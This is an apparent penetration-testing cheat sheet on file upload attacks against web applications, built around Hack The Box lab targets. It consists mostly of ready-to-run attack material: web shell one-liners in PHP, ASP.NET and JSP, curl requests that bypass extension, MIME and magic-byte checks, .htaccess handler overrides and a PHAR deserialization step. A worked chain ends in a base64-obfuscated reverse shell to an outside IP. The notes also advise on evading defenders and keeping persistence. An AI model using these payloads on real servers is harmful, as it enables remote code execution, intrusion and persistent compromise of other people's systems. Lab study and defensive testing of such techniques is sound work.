Back to All Modules

File Upload Attacks

#Overview

File upload vulnerabilities allow attackers to place malicious files on a web server by bypassing file type and content validation. When an application fails to properly validate uploaded files, attackers can upload web shells or executable scripts that lead to remote code execution. File upload attacks are particularly effective when chained with Local File Inclusion (LFI) to execute uploaded files in a restricted upload directory.

#Prerequisites

  • Identified file upload form or API endpoint
  • Burp Suite or proxy for request interception
  • Knowledge of target web technology (PHP, ASP.NET, JSP, etc.)
  • Web shell payload in the appropriate server-side language

#Detection & Enumeration

#Identifying Upload Endpoints

# Scan for common upload paths
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt \
  -u http://target.htb -t 50 | grep -iE "upload|file|avatar|image|media|attach"

# Check for file upload in profile/avatar settings
# Check for import/document upload functionality
# Check CMS plugins allowing media upload
BASH

#Testing Upload Validation

# Create a basic PHP webshell
echo '<?php system($_GET["cmd"]); ?>' > shell.php

# Attempt direct upload -- observe server response
curl -X POST http://target.htb/upload.php -F "file=@shell.php" -v
BASH

#Exploitation / Execution

#Extension Bypass Techniques

# Double extension bypass -- server strips last extension
cp shell.php shell.jpg.php         # If only last extension checked
cp shell.php shell.php.jpg         # If Apache misconfiguration
cp shell.php shell.php5            # Unregistered PHP versions
cp shell.php shell.phtml           # Alternative PHP extension
cp shell.php shell.pHp             # Case variation
cp shell.php shell.phar            # PHP archive format

# Null byte injection (legacy PHP < 5.3.4)
curl -X POST http://target.htb/upload.php \
  -F "file=@shell.php;filename=shell.php%00.jpg"

# Trailing dot / space (Windows file system)
curl -X POST http://target.htb/upload.php \
  -F "file=@shell.php;filename=shell.php."
curl -X POST http://target.htb/upload.php \
  -F "file=@shell.php;filename=shell.php "
BASH

#MIME Type Spoofing

# Intercept upload request in Burp, change Content-Type header
# From: Content-Type: application/x-php
# To:   Content-Type: image/jpeg

# Using curl to spoof MIME
curl -X POST http://target.htb/upload.php \
  -H "Content-Type: multipart/form-data" \
  -F "file=@shell.php;type=image/jpeg"

# Common allowed MIME types:
# image/jpeg, image/png, image/gif, application/pdf, text/plain
BASH

#Magic Bytes Bypass

# GIF89a header -- prepend magic bytes to PHP shell
printf 'GIF89a;\n<?php system($_GET["cmd"]); ?>' > shell.gif.php

# PNG header -- more realistic for image validation
printf '\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x01\x00\x00\x00\x01\x08\x02\x00\x00\x00\x90wS\xde\n<?php system($_GET["cmd"]); ?>' > shell.png.php

# JPEG header
printf '\xff\xd8\xff\xe0\n<?php system($_GET["cmd"]); ?>' > shell.jpg.php
BASH

#.htaccess Upload to Enable PHP Execution

# Create .htaccess to allow PHP in uploads directory
echo 'AddType application/x-httpd-php .jpg' > .htaccess
# Upload .htaccess to the uploads directory
# Now any .jpg with PHP code will execute as PHP

# Alternative: set PHP handler for custom extension
echo 'AddHandler application/x-httpd-php .backup' > .htaccess

# Apache SetHandler directive
echo 'SetHandler application/x-httpd-php' > .htaccess

# Upload via curl
curl -X POST http://target.htb/upload.php \
  -F "file=@.htaccess;filename=.htaccess"
BASH

#File Upload + LFI Chain (Usage HTB Technique)

# 1. Create PHP shell, rename to .jpg
echo '<?php system($_GET["melo"]); ?>' > shell.jpg

# 2. Upload, intercept in Burp, change filename to shell.jpg.php
# Proxy: change filename= parameter to "shell.jpg.php"

# 3. Access the uploaded file directly
curl 'http://admin.usage.htb/uploads/images/shell.jpg.php?melo=id'
# uid=1000(dash) gid=1000(dash) groups=1000(dash)

# 4. Upgrade to reverse shell
curl 'http://admin.usage.htb/uploads/images/shell.jpg.php?melo=echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMzAvNDQ0NCAwPiYx | base64 -d | bash'
BASH

#PHP Code in Image EXIF Data

# Inject PHP code into image EXIF metadata
exiftool -Comment='<?php system($_GET["cmd"]); ?>' image.jpg
# Upload as profile avatar or gallery image
# Execute via LFI: page=uploads/avatar.jpg
BASH

#Phar Deserialization via File Upload

# Create a malicious PHAR file that triggers deserialization when accessed
# Requires a class with __destruct() or __wakeup() magic method in the codebase
phpggc -p phar -o exploit.phar <gadget-chain> <command>

# Upload exploit.phar, trigger via phar:// wrapper
curl 'http://target.htb/page=phar://uploads/exploit.phar/test.txt'
BASH

#Client-Side Validation Bypass

# JavaScript-only validation bypass:
# 1. Open browser Developer Tools
# 2. Find and disable the validation function
# 3. Or intercept with Burp and send original .php file regardless of client warning

# Direct curl bypass (completely skips client-side checks)
curl -X POST http://target.htb/upload.php \
  -F "file=@shell.php;filename=shell.php"
BASH

#Common Web Shell One-Liners

# PHP
echo '<?php system($_GET["c"]); ?>' > shell.php
echo '<?php echo shell_exec($_GET["c"]); ?>' > shell.php
echo '<pre><?php passthru($_REQUEST["c"]); ?></pre>' > shell.php

# ASP.NET
echo '<%@ Page Language="C#" %><% System.Diagnostics.Process.Start("cmd.exe","/c " + Request["c"]); %>' > shell.aspx

# JSP
echo '<% Runtime.getRuntime().exec(request.getParameter("c")); %>' > shell.jsp
BASH

#Common Pitfalls

  • Extension blacklist incomplete -- try .php5, .phtml, .pht, .phar, .shtml, .php7
  • Uploaded file accessible but not executed -- check if upload directory has PHP handler disabled
  • 502/503 on webshell access -- PHP code may have syntax errors or be blocked by WAF
  • File renamed with random string -- use LFI to locate the file, or check response for new filename
  • Double extension not working -- try different variations: shell.php%00.jpg, shell.asp;.jpg

#OPSEC Considerations

  • Uploading .htaccess files is highly suspicious and may trigger file integrity monitoring
  • Multiple extension variants in rapid succession generate anomalous upload patterns
  • Web shells with simple names (shell.php, cmd.php) are easily discovered by defenders
  • GIF89a+PHP hybrid files may fail image processing checks and generate errors in logs

#Post-Exploitation Value

  • Remote code execution as the web server user
  • Persistence through multiple webshells in writable directories
  • File system enumeration via webshell
  • Platform for further exploitation of internal services

#Cross-References

#Tool References

ToolLink
Burp Suitehttps://portswigger.net/burp
exiftoolhttps://exiftool.org
phpggchttps://github.com/ambionics/phpggc
RevShellshttps://www.revshells.com

#Source Machines

  • Usage (Easy, Linux) -- Laravel admin avatar upload: rename .php to .jpg, intercept, append .php extension